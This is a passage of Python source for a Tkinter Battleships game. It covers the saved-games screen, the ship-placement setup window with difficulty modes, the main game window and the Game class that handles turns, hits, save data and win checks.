close_button.bind_to_click(lambda: root.destroy())\r\n\r\n # Function called when 'load saves' button is pressed #\r\n def load_screen():\r\n\r\n # Makes a 'saves frame'\r\n saves = SavesFrame(info_canvas)\r\n\r\n # Deletes all canvas items with tag 'window' (i.e all canvas elements)\r\n info_canvas.delete('window')\r\n load_button.destroy()\r\n\r\n # Creates a new window for saves\r\n info_canvas.create_window(240, 160, window=saves, anchor='center', tag='window')\r\n\r\n # Redefines close_button as back button to splash\r\n close_button = CustomButton(buttons_container, text=\"⏎\", width=80, height=60,\r\n colour=theme.GOLD, fg=theme.WHITE, active=theme.GOLD_DARK)\r\n close_button.place(x=251, y=int(self.main_frame[\"height\"]), anchor=\"se\")\r\n close_button.bind_to_click(lambda: switch_screen('splash'))\r\n\r\n load_button.bind_to_click(load_screen)\r\n\r\n\r\n### Frame within splash saves, inside the splash screen ###\r\nclass SavesFrame(tk.Frame):\r\n def __init__(self, parent):\r\n theme = Colours(manager.theme)\r\n super().__init__(parent)\r\n self[\"bg\"] = theme.GRAY_LIGHT\r\n\r\n # Function to delete a save after 'delete' button is pressed #\r\n def delete(save, index):\r\n\r\n # Destroys all elements within the individual save frame\r\n for child in save.winfo_children():\r\n child.destroy()\r\n\r\n # Resets the ind. 
save frame into an empty save\r\n save[\"bg\"] = theme.GRAY\r\n new_id = tk.Label(save, text=\"EMPTY SAVE\", font=(\"Tw Cen MT\", 12), fg=theme.WHITE, bg=theme.GRAY)\r\n new_id.place(x=10, y=5, anchor='nw')\r\n\r\n # Deletes the saved game from manager's storage\r\n del manager.saved_games[index]\r\n\r\n # Function to open a save when 'open' button is pressed #\r\n def open_save(save, index):\r\n\r\n # Makes a new game and imports the data from manager's storage\r\n game = Game()\r\n game.import_data(manager.saved_games[index])\r\n switch_screen('game', game)\r\n\r\n # Deletes the saved game from manager's storage\r\n del manager.saved_games[index]\r\n\r\n # Creates 3 individual save frames with varying elements inside\r\n for i in range(3):\r\n save = None\r\n\r\n bg = theme.GRAY\r\n\r\n # If manager's storage has save, make the frame white and make it the current save\r\n if len(manager.saved_games) > i:\r\n bg = theme.WHITE\r\n save = manager.saved_games[i]\r\n\r\n # Creates an individual save frame\r\n save_frame = tk.Frame(self, width=400, height=80, bg=bg)\r\n\r\n # Array for laziness... Makes all similar labels have the same colour font\r\n similar_labels = []\r\n\r\n # ID label (i.e \"SAVE #1\")\r\n id_label = tk.Label(save_frame, text=\"{}SAVE #{}\".format(\"\" if save else \"EMPTY \", i + 1),\r\n font=(\"Tw Cen MT\", 12))\r\n similar_labels.append(id_label)\r\n id_label.place(x=10, y=5, anchor='nw')\r\n\r\n # If a save exists, add these elements to the save frame\r\n if save:\r\n\r\n # The date\r\n date_label = tk.Label(save_frame, text=save[\"date\"].strftime('%A %-I:%M%p, %d %b %Y'),\r\n font=(\"Tw Cen MT\", 12))\r\n similar_labels.append(date_label)\r\n date_label.place(x=390, y=5, anchor='ne')\r\n\r\n # The difficulty mode label\r\n mode_label = tk.Label(save_frame, text=\"Difficulty\", font=(\"Tw Cen MT\", 16))\r\n similar_labels.append(mode_label)\r\n mode_label.place(x=30, y=45, anchor='w')\r\n\r\n # The difficulty mode\r\n mode = tk.Label(save_frame, text=save[\"difficulty\"].upper(), font=(\"Tw Cen MT\", 20, \"bold\"))\r\n similar_labels.append(mode)\r\n mode.place(x=90, y=45, anchor='w')\r\n\r\n # Checks how many ships on player's board have been hit\r\n player_count = 0\r\n for ship in save[\"player_ships\"]:\r\n for coord in save[\"player_hit\"]:\r\n if coord in ship:\r\n player_count += 1\r\n\r\n # Checks how many ships on computer's board have been hit\r\n comp_count = 0\r\n for ship in save[\"computer_ships\"]:\r\n for coord in save[\"computer_hit\"]:\r\n if coord in ship:\r\n comp_count += 1\r\n\r\n # Finds the maximum of the two counts, can be used\r\n # as a crude measure of game's progress to completion\r\n avg_game = round(max(player_count * 100/ 17, comp_count * 100 / 17), 1)\r\n avg_game_label = tk.Label(save_frame, text=\"{}% of game completed\".format(avg_game),\r\n font=(\"Tw Cen MT\", 12))\r\n similar_labels.append(avg_game_label)\r\n avg_game_label.place(x=30, y=60, anchor='w')\r\n\r\n # Creates a delete button on each frame, to delete the save\r\n delete_button = CustomButton(save_frame, text=\"Delete\", width=60, height=30, font=(\"Tw Cen Mt\", 12),\r\n fg=theme.WHITE, colour=theme.RED, active=theme.RED_DIM)\r\n delete_button.place(x=390, y=65, anchor='se')\r\n delete_button.bind_to_click(lambda arg=save_frame, arg2=i: delete(arg, arg2))\r\n\r\n # Creates a button to open each save into a game window\r\n open_button = CustomButton(save_frame, text=\"Open\", width=60, height=30, font=(\"Tw Cen MT\", 12),\r\n fg=theme.WHITE, colour=theme.GREEN, 
active=theme.GREEN_DIM)\r\n open_button.place(x=325, y=65, anchor='se')\r\n open_button.bind_to_click(lambda arg=save_frame, arg2=i: open_save(arg, arg2))\r\n\r\n # Changes font fg and bg of all predefined 'similar' labels\r\n for label in similar_labels:\r\n label[\"fg\"] = theme.GRAY_BLACK if save else theme.WHITE\r\n label[\"bg\"] = bg\r\n\r\n # Places each individual save frame into the big save grid (self)\r\n save_frame.grid(column=0, row=i, pady=(0, 5))\r\n\r\n\r\n### Board setup Window ###\r\nclass SetupWindow(tk.Frame):\r\n ### NB: The SetupWindow frame is split into 3 main column areas.\r\n # The first column area is for the progress bar (UNUSED IN SETUP)\r\n # The second column area is for the main game grid and ships container\r\n # The third column area is for help information, mode selection and other buttons\r\n ###\r\n\r\n def __init__(self, parent):\r\n super().__init__(parent)\r\n\r\n theme = Colours(manager.theme)\r\n\r\n # Creates a new game object\r\n self.game = Game()\r\n\r\n # Left container for the progress bar and some info text #\r\n progress_container = tk.Frame(self, bg=theme.GRAY_LIGHT, height=570)\r\n progress_container.grid(column=0, row=0, sticky='n', pady=15)\r\n progress_container.pack_propagate(False)\r\n\r\n # Label for progress bar\r\n progress_label = tk.Label(progress_container, text=\"Battleships\\nRemaining\", font=(\"Tw Cen Mt\", 24, \"bold\"),\r\n fg=theme.GRAY_DARK, bg=theme.GRAY_LIGHT)\r\n progress_label.pack(side='bottom', pady=(10, 20))\r\n\r\n # Actual progress bar\r\n self.progress_bar = ProgressBar(progress_container, direction=\"down\",\r\n colours=(theme.GRAY, theme.GRAY_BLACK), bg_canvas=theme.GRAY_LIGHT)\r\n self.progress_bar.pack(side='bottom')\r\n\r\n # Linking progress bar width to bounding countainer (progress_container)\r\n progress_container[\"width\"] = int(self.progress_bar[\"width\"]) + 20\r\n\r\n\r\n # Middle container for the grid and ships #\r\n main_container = tk.Frame(self, bg=theme.WHITE)\r\n main_container.grid(column=1, row=0, padx=10, pady=15)\r\n\r\n # The setup grid for player to place ships on\r\n self.main_grid = CustomGrid(main_container, multiplier=4,\r\n progress_bar=self.progress_bar, bottom_hidden=True, is_game_board=False)\r\n self.main_grid.pack()\r\n\r\n # The black bottom bar for player to select ships\r\n ships_container = tk.Canvas(main_container, width=int(self.main_grid[\"width\"]), height=130,\r\n highlightthickness=0, bg=theme.GRAY_DARK)\r\n\r\n self.current_ship_selection = None\r\n\r\n # Gets the length of the ship that's been clicked\r\n def return_current_length(ship):\r\n\r\n # If a new ship is clicked, unselect current ship\r\n if self.main_grid.selection_length != 0:\r\n self.current_ship_selection.selected = False\r\n self.current_ship_selection.unhover(None)\r\n\r\n # Sets the length to be used on the setup grid as length of new ship\r\n self.main_grid.selection_length = ship.length\r\n self.main_grid.selection_dir = ship.dir\r\n\r\n # Sets currently selected ship as current selected ship\r\n self.current_ship_selection = ship\r\n\r\n # Defines all the ships (length and direction), and their positions in ship container\r\n self.ships = [Ship(ships_container, 40, 15, length=2, dir='v'),\r\n Ship(ships_container, 90, 15, length=3, dir='v'),\r\n Ship(ships_container, 140, 15, length=3, dir='v'),\r\n Ship(ships_container, 220, 15, length=5),\r\n Ship(ships_container, 220, 65, length=4)]\r\n\r\n ships_container.pack(pady=(0, 10))\r\n\r\n # Binds length changer to a ship being clicked\r\n for 
ship in self.ships: ship.bind_to_click(return_current_length)\r\n\r\n\r\n        ## Right container for the small grid and button/info display ##\r\n        right_container = tk.Frame(self)\r\n        right_container.grid(column=2, row=0, sticky='n', pady=15)\r\n\r\n        # Container for the help guide and text\r\n        help_container = tk.Frame(right_container, bg=theme.GRAY_BLACK, width=220, height=200)\r\n        help_container.pack(side='top', pady=(0, 10))\r\n\r\n        # 'SETUP GUIDE' label\r\n        help_label = tk.Label(help_container, text=\"SETUP GUIDE\", font=(\"Tw Cen MT\", 20, \"bold\"),\r\n                              bg=theme.GRAY_BLACK, fg=theme.WHITE)\r\n        help_label.pack(pady=(8, 2))\r\n\r\n        # Places all the help text\r\n        help_text = ['1) Click on a white ship to select, '\r\n                     '\\nthen hover over grid to set ship.',\r\n                     '\\n2) Rotate a ship by right-clicking\\n on the grid.',\r\n                     '\\n3) Click mode to toggle difficulty.']\r\n        help_desc = CustomLongText(help_container, text=help_text, width=220, height=160,\r\n                                   bg=theme.GRAY_DARK, fg=theme.WHITE, side='left')\r\n        help_desc[\"pady\"] = 10\r\n        help_desc.pack()\r\n\r\n        # Container for the difficulty toggle box\r\n        difficulty_container = tk.Frame(right_container, width=220, height=52, bg=theme.GRAY_DARK)\r\n        difficulty_container.pack(pady=(0, 10))\r\n        difficulty_container.pack_propagate(0)\r\n\r\n        # 'MODE SELECTION' Label for the difficulty toggle\r\n        difficulty_label = tk.Label(difficulty_container, text=\"MODE\\nSELECTION\", font=(\"Tw Cen MT\", 12, \"bold\"),\r\n                                    fg=theme.WHITE, bg=theme.GRAY_DARK, anchor='e', justify='right')\r\n        difficulty_label.pack(side='left', padx=(10, 0))\r\n\r\n        # Defines the startup position of the mode, as NORMAL\r\n        difficulty_button = tk.Label(difficulty_container, text='NORMAL', font=(\"Tw Cen MT\", 24, \"bold\"),\r\n                                     fg=theme.WHITE, bg=theme.GRAY_BLACK, width=12, height=2, padx=20)\r\n        difficulty_button.pack(side='left', padx=(10, 0))\r\n\r\n        self.difficulty_colour = theme.GRADIENT[1]\r\n\r\n        # Changes the difficulty if the mode dial is clicked #\r\n        def difficulty_change():\r\n            modes = ['easy', 'normal', 'hard', 'master']\r\n\r\n            # Checks to see what the current difficulty is\r\n            current_index = modes.index(difficulty_button[\"text\"].lower())\r\n\r\n            # If the current difficulty is 'master', set new difficulty to 'easy'\r\n            # If current difficulty isn't 'master', go to next difficulty in 'modes' array\r\n            if modes[-1] == difficulty_button[\"text\"].lower():\r\n                self.game.difficulty = modes[0]\r\n            else:\r\n                self.game.difficulty = modes[current_index + 1]\r\n\r\n            # Sets the new button text and look to match new difficulty\r\n            self.difficulty_colour = theme.GRADIENT[modes.index(self.game.difficulty)]\r\n            difficulty_button[\"bg\"] = self.difficulty_colour\r\n            difficulty_button[\"text\"] = self.game.difficulty.upper()\r\n\r\n        # Binds event handlers (aesthetic and click) to the difficulty toggle\r\n        difficulty_button.bind(\"<Enter>\", lambda event: difficulty_button.config(bg=self.difficulty_colour))\r\n        difficulty_button.bind(\"<Leave>\", lambda event: difficulty_button.config(bg=theme.GRAY_BLACK))\r\n        difficulty_button.bind(\"<Button-1>\", lambda event: difficulty_change())\r\n\r\n        # Container for buttons 'RESET BOARD' and 'GO!'\r\n        info_frame = tk.Frame(right_container, bg=theme.GRAY_LIGHT, width=220, height=230)\r\n        info_frame.pack()\r\n        info_frame.pack_propagate(0)\r\n\r\n        # Function to be called when board is reset #\r\n        def reset_board():\r\n\r\n            # Wipes everything off the main grid\r\n            self.main_grid.update_canvas()\r\n\r\n            # Sets current selection to none\r\n            self.main_grid.selection = 
[]\r\n self.main_grid.selection_length = 0\r\n self.main_grid.selection_dir = 'h'\r\n\r\n # Resets states of all ships in ship container\r\n for ship in self.ships:\r\n ship.selected = False\r\n ship.unhover(None)\r\n\r\n # Creates 'RESET BOARD' button\r\n reset_board_button = CustomButton(info_frame, text=\"RESET BOARD\", height=40, width=200, align='center',\r\n colour=theme.ORANGE, fg=theme.ORANGE_DARK, active=theme.ORANGE_DIM,\r\n font=(\"Tw Cen MT\", 20, \"bold\"), bg_canvas=theme.GRAY_LIGHT)\r\n reset_board_button.pack(pady=10)\r\n reset_board_button.bind_to_click(reset_board)\r\n\r\n # Function to be called when game is to start #\r\n def start_game():\r\n\r\n # Checks if all ships have been placed (by checking if there are any\r\n # unselected ships in ships container), creates popup if not true\r\n for ship in self.ships:\r\n if ship.selected == False:\r\n popup = Popup(parent, text=\"All ships must be placed!\", bg=theme.RED, fg=\"white\")\r\n break\r\n\r\n # Sets player ships to setup grid's current custom layout\r\n # Auto-generates a new layout for the computer (based on computer_logic brain)\r\n else:\r\n self.game.add_player_ships(self.main_grid.selection)\r\n self.game.add_computer_ships(self.game.computer_logic.generate_layout())\r\n\r\n # Switches the app screen to 'game' window with created game\r\n switch_screen('game', args=self.game)\r\n\r\n # Creates 'GO!' button\r\n start_game_button = CustomButton(info_frame, text=\"GO!\", height=150, width=200,\r\n colour=theme.GREEN, fg=theme.GREEN_DARK, active=theme.GREEN_DIM,\r\n font=(\"Tw Cen MT\", 40, \"bold\"), bg_canvas=theme.GRAY_LIGHT)\r\n start_game_button.bind_to_click(start_game)\r\n start_game_button.pack(pady=(0, 10))\r\n\r\n # Control frame is a container for any application related queries\r\n # like exiting from the game or going back to startup splash\r\n control_frame = tk.Frame(right_container, bg=theme.GRAY_LIGHT, width=220, height=60)\r\n control_frame.pack(pady=10)\r\n\r\n # Back to splash – child of control frame\r\n back_button = CustomButton(control_frame, text=\"⏎\", width=120, height=40,\r\n colour=theme.GOLD, fg=theme.WHITE, active=theme.GOLD_DARK,\r\n bg_canvas=theme.GRAY_LIGHT)\r\n back_button.place(x=10, y=51, anchor='sw')\r\n back_button.bind_to_click(lambda: switch_screen('splash'))\r\n\r\n # Close entire application – child of control frame\r\n close_button = CustomButton(control_frame, text=\"✘\", width=70, height=40,\r\n colour=theme.RED, fg=theme.WHITE, active=theme.RED_DIM,\r\n bg_canvas=theme.GRAY_LIGHT)\r\n close_button.place(x=210, y=51, anchor=\"se\")\r\n close_button.bind_to_click(lambda: root.destroy())\r\n\r\n\r\n### The main Game Window ###\r\nclass GameWindow(tk.Frame):\r\n ### NB: The GameWindow frame is split into 3 main column areas.\r\n # The first column area is for the progress bar.\r\n # The second column area is for the main game grid and ships container\r\n # The third column area is for the display grid, as well as the game stats\r\n ###\r\n\r\n def __init__(self, parent, game):\r\n super().__init__(parent)\r\n\r\n theme = Colours(manager.theme)\r\n self.game = game\r\n\r\n # Left container for the progress bar and text #\r\n progress_container = tk.Frame(self, bg=theme.GRAY_LIGHT, height=570)\r\n progress_container.grid(column=0, row=0, sticky='n', pady=15)\r\n progress_container.pack_propagate(False)\r\n\r\n # Label for progress bar\r\n progress_label = tk.Label(progress_container, text=\"Opponent\\nShips\", font=(\"Tw Cen Mt\", 24, \"bold\"),\r\n fg=theme.GRAY_BLACK, 
bg=theme.GRAY_LIGHT)\r\n progress_label.pack(side='bottom', pady=(10, 20))\r\n\r\n # Actual progress bar\r\n self.progress_bar = ProgressBar(progress_container, direction=\"down\",\r\n colours=(theme.RED, theme.RED_DARK), bg_canvas=theme.GRAY_LIGHT)\r\n self.progress_bar.pack(side='bottom')\r\n\r\n # Linking progress bar width to bounding countainer (progress_container)\r\n progress_container[\"width\"] = int(self.progress_bar[\"width\"]) + 20\r\n\r\n\r\n # Middle container for the grid and ships #\r\n main_container = tk.Frame(self, bg=theme.WHITE)\r\n main_container.grid(column=1, row=0, padx=10, pady=15)\r\n\r\n # Computer's grid (the grid that the player tries to find ships on)\r\n self.main_grid = CustomGrid(main_container, multiplier=4,\r\n progress_bar=self.progress_bar, bottom_hidden=True,\r\n is_game_board=True, game=self.game, owner='computer')\r\n self.game.computer_board = self.main_grid\r\n self.main_grid.pack()\r\n\r\n # Filler space for aesthetic purpose, contains last hit coord\r\n bottom_filler = tk.Frame(main_container, width=int(self.main_grid[\"width\"]), height=130,\r\n highlightthickness=0, bg=theme.GRAY_DARK)\r\n bottom_filler.pack_propagate(0)\r\n bottom_filler.pack(pady=(0, 10))\r\n\r\n # Last location that the player has hit\r\n last_location = tk.Label(bottom_filler, text=\"––\",\r\n fg=theme.WHITE, bg=theme.GRAY_BLACK,\r\n font=(\"Tw Cen MT\", 60, \"bold\"), height=2, width=4)\r\n\r\n # Links the last_location label with the main_grid's logic\r\n self.main_grid.linked_coordinate = last_location\r\n\r\n last_label = tk.Label(bottom_filler, text=\"Last Location\", fg=theme.WHITE, bg=theme.GRAY_DARK,\r\n font=(\"Tw Cen MT\", 24, \"bold\"))\r\n last_location.pack(side='left')\r\n last_label.pack(side='left', padx=20)\r\n\r\n\r\n # Right container for the small grid and button/info display #\r\n right_container = tk.Frame(self)\r\n right_container.grid(column=2, row=0, sticky='n', pady=15)\r\n\r\n # Container for the player's grid\r\n small_grid_container = tk.Frame(right_container)\r\n small_grid_container.pack(side='top', pady=(0, 10))\r\n\r\n # Player's grid\r\n self.small_grid = CustomGrid(small_grid_container, multiplier=2, progress_bar=None,\r\n disabled=True, bottom_hidden=True, game=self.game, owner='player')\r\n self.game.player_board = self.small_grid\r\n self.small_grid.pack(side='top')\r\n\r\n # Shows all the ships on the board\r\n self.small_grid.show_hidden_ships()\r\n\r\n # Information container that belongs to the player's grid\r\n small_grid_info = tk.Frame(small_grid_container, width=220, height=40, bg=theme.GRAY_BLACK)\r\n small_grid_info.pack()\r\n small_grid_info.grid_propagate(0)\r\n\r\n # Generic text – static\r\n tk.Label(small_grid_info, text=\"YOUR\\nTERRITORY\", justify='right',\r\n font=(\"Tw Cen MT\", 13, \"bold\"), fg=theme.WHITE,\r\n bg=theme.GRAY_BLACK).grid(column=0, row=0, sticky='w', padx=10)\r\n\r\n tk.Label(small_grid_info, text=\"HIT\", fg=theme.WHITE, bg=theme.GRAY_BLACK,\r\n font=(\"Tw Cen MT\", 12, \"bold\")).grid(column=2, row=0, sticky='e',\r\n padx=(5, 0), pady=(14, 0))\r\n\r\n # Percentage of player ships sunk\r\n percentage_text = tk.Label(small_grid_info, text=\"0.00%\", fg=theme.GREEN, bg=theme.GRAY_BLACK,\r\n font=(\"Tw Cen MT\", 30, \"bold\"))\r\n percentage_text.grid(column=1, row=0, sticky='e')\r\n self.small_grid.linked_percentage = percentage_text\r\n\r\n # Stats about the current difficulty mode\r\n small_grid_details = tk.Frame(small_grid_container, width=220, height=130,\r\n bg=theme.GRAY_LIGHT, 
highlightthickness=10, highlightbackground=theme.GRAY)\r\n small_grid_details.pack()\r\n small_grid_details.pack_propagate(0)\r\n\r\n # Array of all details display text about the difficulty stats\r\n details = ['>bCURRENT STATS',\r\n 'Games won: {1} out of {0}\\n'\r\n 'Games lost: {2} out of {0}'.format(manager.stats[self.game.difficulty][0] + manager.stats[self.game.difficulty][1],\r\n manager.stats[self.game.difficulty][0],\r\n manager.stats[self.game.difficulty][1]),\r\n 'Difficulty: {}'.format(game.difficulty.upper())]\r\n\r\n # Defines custom font types for the window\r\n fonts = {\">b\": (\"Tw Cen MT\", 14, \"bold\"),\r\n \"default\": (\"Tw Cen MT\", 14)}\r\n\r\n # Creates a frame with labels for every details text\r\n longlabel = CustomLongText(small_grid_details, text=details,\r\n fg=theme.GRAY_BLACK, bg=theme.GRAY_LIGHT,\r\n width=200, height=110, fonts=fonts)\r\n longlabel.pack(pady=15)\r\n\r\n # Container for who's turn it currently is\r\n info_frame = tk.Frame(right_container, bg=theme.GRAY_BLACK, width=220, height=100)\r\n info_frame.pack()\r\n info_frame.pack_propagate(0)\r\n\r\n # Label for who's turn it currently is\r\n turn_status = tk.Label(info_frame, text=\"PLAYER's\", fg=theme.RED,\r\n font=(\"Tw Cen MT\", 30, \"bold\"), width=12)\r\n turn_status.pack(side='top', pady=(20, 0), ipady=5)\r\n\r\n # Links the game's turn status to the label created above\r\n self.game.status = turn_status\r\n\r\n # Generic text – static\r\n tk.Label(info_frame, text=\"TURN\", fg=theme.GRAY_LIGHT,\r\n font=(\"Tw Cen MT\", 14, \"bold\"), bg=theme.GRAY_BLACK).pack()\r\n\r\n # Control frame with options to resign and close game\r\n control_frame = tk.Frame(right_container, bg=theme.GRAY_LIGHT, width=220, height=60)\r\n control_frame.pack(pady=10)\r\n\r\n # Button to resign from game (default loss)\r\n resign_button = CustomButton(control_frame, text=\"⚑\", width=120, height=40,\r\n colour=theme.GOLD, fg=theme.WHITE, active=theme.GOLD_DARK,\r\n bg_canvas=theme.GRAY_LIGHT)\r\n resign_button.place(x=10, y=51, anchor='sw')\r\n resign_button.bind_to_click(lambda: self.game.check_win(override=True))\r\n\r\n\r\n # Function called when 'close_button' is clicked. Creates a popup #\r\n # asking whether or not player wishes to save the game. 
#\r\n def close():\r\n background = theme.GRAY_BLACK\r\n\r\n # Creates popup\r\n popup = Popup(root, text=\"Do you wish to save this game?\",\r\n subtext=\"Note: Oldest game will be deleted if memory is full.\",\r\n bg=background, fg=theme.WHITE, stay=True)\r\n popup[\"height\"] = 140\r\n\r\n # Sets the coordinates of where the main and subtext of the popup appear\r\n # Purpose: To make room for the yes/no buttons\r\n popup.coords(popup.main, int(popup[\"width\"]) / 2, 35)\r\n popup.coords(popup.sub, int(popup[\"width\"]) / 2, 60)\r\n\r\n # Container for the buttons\r\n container = tk.Frame(bg=background)\r\n\r\n # Creates a 'Yes' button, for saving the game.\r\n save = CustomButton(container, text=\"Yes\", colour=theme.GREEN, fg=theme.WHITE,\r\n active=theme.GREEN_DARK, bg_canvas=background,\r\n width=200, height=40)\r\n\r\n # Creates a 'No' button, for abandoning the game\r\n close = CustomButton(container, text=\"No\", colour=theme.RED, fg=theme.WHITE,\r\n active=theme.RED_DIM, bg_canvas=background,\r\n width=200, height=40)\r\n\r\n # Function called when any button is clicked, saves game (if applicable)\r\n # and returns back to startup splash\r\n def return_to_splash(save):\r\n if save:\r\n\r\n # Gets a summary data packet of the current game, saves to manager\r\n # and exports save data to a file (saves.bts)\r\n data = self.game.get_data_summary()\r\n manager.save_game(data)\r\n manager.export_to_file()\r\n\r\n # Destroys the popup and the container, returns to splash\r\n popup.destroy()\r\n container.destroy()\r\n switch_screen('splash')\r\n\r\n # Binds clicks of Yes/No buttons to 'return_to_splash' function\r\n close.bind_to_click(lambda: return_to_splash(save=False))\r\n save.bind_to_click(lambda: return_to_splash(save=True))\r\n\r\n save.pack(side='left', padx=10)\r\n close.pack(side='right', padx=10)\r\n\r\n # Places the button container just below the main and subtexts and popup\r\n container.place(x=root.winfo_width() / 2, y=root.winfo_height() / 2 + 35, anchor='center')\r\n\r\n # Destroys the popup window after 10 seconds if no activity happens.\r\n root.after(10000, container.destroy)\r\n\r\n # Creates the close_button\r\n close_button = CustomButton(control_frame, text=\"✘\", width=70, height=40,\r\n colour=theme.RED, fg=theme.WHITE, active=theme.RED_DIM, bg_canvas=theme.GRAY_LIGHT)\r\n close_button.place(x=210, y=51, anchor=\"se\")\r\n close_button.bind_to_click(lambda: close())\r\n\r\n\r\n### Game object with management on how the game runs ###\r\nclass Game(object):\r\n def __init__(self):\r\n\r\n # Difficulty selection range: easy, normal, hard, master\r\n self.difficulty = \"normal\"\r\n self.date = datetime.datetime.today()\r\n self.theme = Colours(manager.theme)\r\n\r\n self.manager = manager\r\n self.game_over = False\r\n\r\n # The following (up to #####) links to different elements #\r\n # in other classes for access to different information #\r\n\r\n # Structured as individual ships (with alpha-num coords), links to the playing grids\r\n self.player_ships = []\r\n self.player_remaining_ships = []\r\n\r\n self.computer_ships = []\r\n self.computer_remaining_ships = []\r\n\r\n # Structured as alpha-num coords, links to the playing grids\r\n self.player_board_hit = []\r\n self.computer_board_hit = []\r\n\r\n # Boards are linked to the 'playing grids' in GameWindow\r\n self.player_board = None\r\n self.computer_board = None\r\n\r\n # Status is linked to 'turn status' in GameWindow\r\n self.status = None\r\n\r\n #####\r\n\r\n # Defines the computer's brain for 
move/layout generation\r\n self.computer_logic = ComputerLogic()\r\n\r\n ## Sets the ships on player's board to the layout from setup ##\r\n def add_player_ships(self, ships_array):\r\n self.player_ships = copy.deepcopy(ships_array)\r\n self.player_remaining_ships = copy.deepcopy(ships_array)\r\n\r\n ## Sets out predefined ships for computer's board ##\r\n def add_computer_ships(self, ships_array):\r\n self.computer_ships = copy.deepcopy(ships_array)\r\n self.computer_remaining_ships = copy.deepcopy(ships_array)\r\n\r\n ## Sets the game grids (from the GameWindow class) for access to data ##\r\n def set_boards(self, player_board, computer_board):\r\n self.player_board = player_board\r\n self.computer_board = computer_board\r\n\r\n ## Exporting game data ##\r\n def get_data_summary(self):\r\n data = {\"difficulty\": self.difficulty, \"date\": self.date,\r\n \"player_ships\": self.player_ships,\r\n \"player_hit\": self.player_board_hit,\r\n\r\n \"computer_ships\": self.computer_ships,\r\n \"computer_hit\": self.computer_board_hit,\r\n \"computer_cache\": self.computer_logic.cached_ship_coords}\r\n\r\n return data\r\n\r\n ## Imports all the game data ##\r\n def import_data(self, data):\r\n self.difficulty = data[\"difficulty\"]\r\n\r\n self.add_player_ships(data[\"player_ships\"])\r\n self.player_board_hit = data[\"player_hit\"]\r\n\r\n self.add_computer_ships(data[\"computer_ships\"])\r\n self.computer_board_hit = data[\"computer_hit\"]\r\n self.computer_logic.cached_ship_coords = data[\"computer_cache\"]\r\n\r\n self.computer_logic.set_hit_spaces(self.player_board_hit)\r\n\r\n ## After any position is played (coord in alpha-num) ##\r\n # – Returns who's turn it is after the play\r\n # – Makes necessary changes to ship variables (if any are hit)\r\n ##\r\n def game_control(self, coord, board_name):\r\n\r\n # If last move was played on the computer's board (the big grid)\r\n if board_name == 'computer':\r\n self.computer_board_hit.append(coord)\r\n\r\n for ship in self.computer_remaining_ships:\r\n\r\n # Checks if the last move hit a ship\r\n if coord in ship:\r\n\r\n # Finds the original ship\r\n current_ship = self.computer_ships[self.computer_remaining_ships.index(ship)]\r\n name = Ship.get_name(len(current_ship))\r\n ship_sunk = False\r\n\r\n # If the length of the current ship (before hit) was 1 (i.e 1 more hit dead)\r\n if len(ship) == 1:\r\n ship_sunk = True\r\n print(\"Computer's {} is now sunk!\".format(name))\r\n\r\n # Removes the hit square from remaining spaces\r\n ship.remove(coord)\r\n\r\n return(board_name, ship_sunk, current_ship)\r\n\r\n # Did not hit a ship\r\n else:\r\n\r\n # Sets the current turn to 'COMPUTERS'\r\n self.status[\"text\"] = \"COMPUTER's\"\r\n self.status[\"fg\"] = self.theme.GOLD\r\n\r\n hit_coord = None\r\n counter = 0\r\n max = {'easy': 1,\r\n 'normal': 2,\r\n 'hard': 3,\r\n 'master': 4}.get(self.difficulty, 1)\r\n\r\n # Gives the computer up to '4 virtual turns' on hard difficulty\r\n while counter < max:\r\n hit_coord = CoordUtils.convert_type(self.computer_logic.make_move())\r\n\r\n # Checks if 'hit_coord' hits a ship\r\n for ship in self.player_remaining_ships:\r\n if CoordUtils.convert_type(hit_coord) in ship:\r\n counter += 100\r\n break\r\n else:\r\n counter += 1\r\n\r\n # Plays the coordinate previously generated after 1 second (to simulate 'thinking')\r\n def next(): self.player_board.hit(None, self.player_board.coord_to_rect(hit_coord), override=True)\r\n root.after(1000, next)\r\n\r\n # Returns that the next move is on the player's board (i.e 
computer's turn)\r\n            return ('player',)\r\n\r\n        # If computer was the one who played the last move\r\n        elif board_name == 'player':\r\n            self.player_board_hit.append(coord)\r\n\r\n            for ship in self.player_remaining_ships:\r\n\r\n                # Checks if the last move hit a ship\r\n                if coord in ship:\r\n\r\n                    # Finds the original ship for aesthetic purposes\r\n                    current_ship = self.player_ships[self.player_remaining_ships.index(ship)]\r\n                    name = Ship.get_name(len(current_ship))\r\n                    ship_sunk = False\r\n\r\n                    # If the length of the current ship (before hit) was 1 (i.e 1 more hit dead)\r\n                    if len(ship) == 1:\r\n                        ship_sunk = True\r\n                        print(\"Player's {} is now sunk!\".format(name))\r\n\r\n                    # Removes the hit square from remaining spaces\r\n                    ship.remove(coord)\r\n\r\n                    # Generates a new hit coordinate based on previously hit coordinate\r\n                    hit_coord = CoordUtils.convert_type(self.computer_logic.square_hit(coord, sunk=ship_sunk, ship=current_ship))\r\n\r\n                    # Plays predefined coordinate after 1s (simulates 'thinking' time)\r\n                    def next(): self.player_board.hit(None, self.player_board.coord_to_rect(hit_coord), override=True)\r\n                    root.after(1000, next)\r\n\r\n                    return(board_name, ship_sunk, current_ship)\r\n\r\n            # Didn't hit a ship\r\n            else:\r\n\r\n                # Sets turn status\r\n                self.status[\"text\"] = \"PLAYER's\"\r\n                self.status[\"fg\"] = self.theme.RED\r\n                self.turn_counter = 0\r\n\r\n                # Re-enables the main grid (as it's the player's turn again)\r\n                self.computer_board.disabled = False\r\n                return ('computer',)\r\n\r\n    ## Check if all remaining occupied squares are hit – backend ##\r\n    def check_win(self, override=False):\r\n\r\n        # If game is already over, no point in creating\r\n        # another popup so just returns nothing\r\n        if self.game_over:\r\n            return\r\n\r\n        # Sets the current result to override\r\n        result = override\r\n        bg_colour = self.theme.GREEN_DIM\r\n\r\n        # If the length of player ships is 0, make computer the winner\r\n        for ship in self.player_remaining_ships:\r\n            if len(ship) > 0: break\r\n        else:\r\n\r\n            # Sets result outcome to computer\r\n            result = 'computer'\r\n            print(\">>> Player lost!\")\r\n\r\n            # Increment manager 'loss' stat of current difficulty by 1\r\n            self.manager.stats[self.difficulty][1] += 1\r\n            bg_colour = self.theme.RED\r\n\r\n        # If the length of computer ships is 0, make player the winner\r\n        for ship in self.computer_remaining_ships:\r\n            if len(ship) > 0: break\r\n        else:\r\n            result = 'player'\r\n            print(\">>> Player wins!\")\r\n\r\n            # Increments win stat of current difficulty by 1\r\n            self.manager.stats[self.difficulty][0] += 1\r\n\r\n\r\n        # If player resigns (i.e override = True)\r\n        if result and result not in (\"player\", 